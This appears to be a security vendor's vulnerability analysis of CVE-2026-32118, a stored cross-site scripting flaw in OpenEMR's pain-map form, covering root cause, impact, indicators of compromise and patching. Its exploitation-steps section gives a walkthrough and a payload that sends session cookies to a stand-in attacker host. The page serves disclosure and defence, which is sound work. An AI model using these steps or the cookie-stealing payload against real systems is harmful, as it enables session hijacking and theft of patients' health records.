CVE-2026-32118: 
OpenEMR vulnerability analysis and mitigation

Overview

CVE-2026-32118 is a stored cross-site scripting (XSS) vulnerability in OpenEMR's Graphical Pain Map ("clickmap") form that allows any authenticated clinician to inject arbitrary JavaScript executed in the browsers of all subsequent users who view the affected encounter form. Affecting all OpenEMR versions prior to 8.0.0.1, the flaw is compounded by session cookies not being marked HttpOnly, enabling full session hijacking including of administrator accounts. The vulnerability was published on March 11, 2026, and patched in OpenEMR 8.0.0.1. It carries a CVSS v3.1 base score of 5.4 (Moderate) per the GitHub advisory, though Feedly's aggregated scoring places it at 9.0 (Critical) based on the full session hijacking impact (GitHub Advisory).

Technical details

The root cause (CWE-79) lies in library/js/clickmap.js, where the fn_buildMarker function decodes a URL-encoded annotation via decodeURIComponent() and concatenates it directly into an HTML string passed to jQuery's $() constructor — causing jQuery to parse and render it as live DOM elements with active event handlers. No HTML sanitization exists at any layer: the server-side Controller::populate_object() applies only SQL escaping (mysqli_real_escape_string) without HTML encoding, and the Smarty template outputs the raw database value into a JavaScript string literal without enabling escape_html. On page load, fn_load re-passes each stored annotation through fn_buildMarker, restoring the original HTML payload via decodeURIComponent() and injecting it into the DOM. The aggravating factor is that SessionConfigurationBuilder.php sets HttpOnly = false on session cookies, making session token exfiltration via XSS trivially achievable (GitHub Advisory).

Impact

Successful exploitation allows an authenticated clinician with low privileges to persistently inject malicious JavaScript that executes in the browsers of every subsequent user — including other clinicians and administrators — who views the affected encounter form or its encounter report. Because session cookies lack the HttpOnly flag, attackers can directly exfiltrate session tokens, enabling full session hijacking and impersonation of any user including administrators. In a healthcare environment, this translates to unauthorized access to protected health information (PHI), privilege escalation within the application, and potential HIPAA regulatory violations (GitHub Advisory).

Exploitability

A proof-of-concept (PoC) with step-by-step reproduction instructions and a specific payload (<img src=x onerror=alert(document.domain)>) is publicly available in the GitHub security advisory. The EPSS score is approximately 0.029% (0.000290), indicating low current automated exploitation probability. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated account with permission to create encounter forms, limiting the attack surface to internal or compromised clinician accounts (GitHub Advisory).

Exploitation steps

  1. Authenticate: Log into OpenEMR as any authenticated user with permission to create or edit encounter forms (e.g., a clinician account).
  2. Navigate to the vulnerable form: Open a patient encounter, then add a new "Graphical Pain Map" form via Forms > Graphical Pain Map.
  3. Inject the payload: Click on the pain map image to open the annotation dialog. In the "Detail" textarea, enter a malicious payload such as <img src=x onerror=alert(document.domain)> or a cookie-stealing script like <img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">.
  4. Persist the payload: Click "Save" in the dialog, then click the main form "Save" button. The annotation is URL-encoded by encodeURIComponent(), stored via save.php with only SQL escaping, and persisted to the database without HTML sanitization.
  5. Trigger execution: Any user (including administrators) who subsequently opens the saved Graphical Pain Map form or views the encounter report will have the payload decoded by decodeURIComponent() in fn_buildMarker and injected as live HTML into the DOM, executing the script.
  6. Hijack session: Because session cookies are not HttpOnly, the exfiltrated cookie can be used to impersonate the victim user, gaining unauthorized access to PHI and administrative functions (GitHub Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from a clinician's browser session to unexpected external domains (e.g., attacker-controlled servers) containing URL-encoded cookie or session data in query parameters; unusual GET/POST requests to attacker infrastructure originating from OpenEMR client sessions.
  • Logs: OpenEMR access logs showing repeated access to Graphical Pain Map encounter forms (/interface/clickmap/) by multiple different users shortly after a single clinician saved a form; server-side logs recording POST requests to save.php with URL-encoded HTML tags (%3Cimg, %3Cscript) in annotation fields.
  • File System: No direct file system artifacts expected for this XSS; however, review save.php database entries in the clickmap data table for annotation values containing encoded HTML tags or JavaScript event handlers.
  • Application: Database records in the OpenEMR clickmap/encounter form tables containing URL-encoded payloads such as %3Cimg+src%3Dx+onerror%3D or %3Cscript%3E in annotation fields (GitHub Advisory).

Mitigation and workarounds

The vulnerability is fixed in OpenEMR 8.0.0.1; all users should upgrade immediately. As additional hardening measures, administrators should configure session cookies with the HttpOnly and Secure flags in src/Common/Session/SessionConfigurationBuilder.php to prevent JavaScript-based session token theft even if XSS payloads are present. Deploying a Web Application Firewall (WAF) with XSS detection rules can provide a compensating control for organizations unable to upgrade immediately. Restricting clinician permissions to create or edit encounter forms can reduce the attack surface until patching is complete (GitHub Advisory).

Community reactions

The vulnerability was reported by researcher pavelkohout396 and analyzed by simecek, as credited in the GitHub advisory. Security blog Infinitsec published a post specifically covering CVE-2026-32118 shortly after disclosure. Aisle security research published a broader report noting 38 critical security vulnerabilities discovered in healthcare software used by 100,000 providers, which appears to include this finding, highlighting systemic security concerns in healthcare EHR platforms (GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related OpenEMR vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-40506HIGH7
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 17, 2026
CVE-2026-76614MEDIUM5.3
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026
CVE-2026-40509MEDIUM5.3
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026
CVE-2026-40508MEDIUM5.1
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026
CVE-2026-40507MEDIUM5.1
  • OpenEMR logoOpenEMR
  • cpe:2.3:a:open-emr:openemr
NoYesAug 19, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management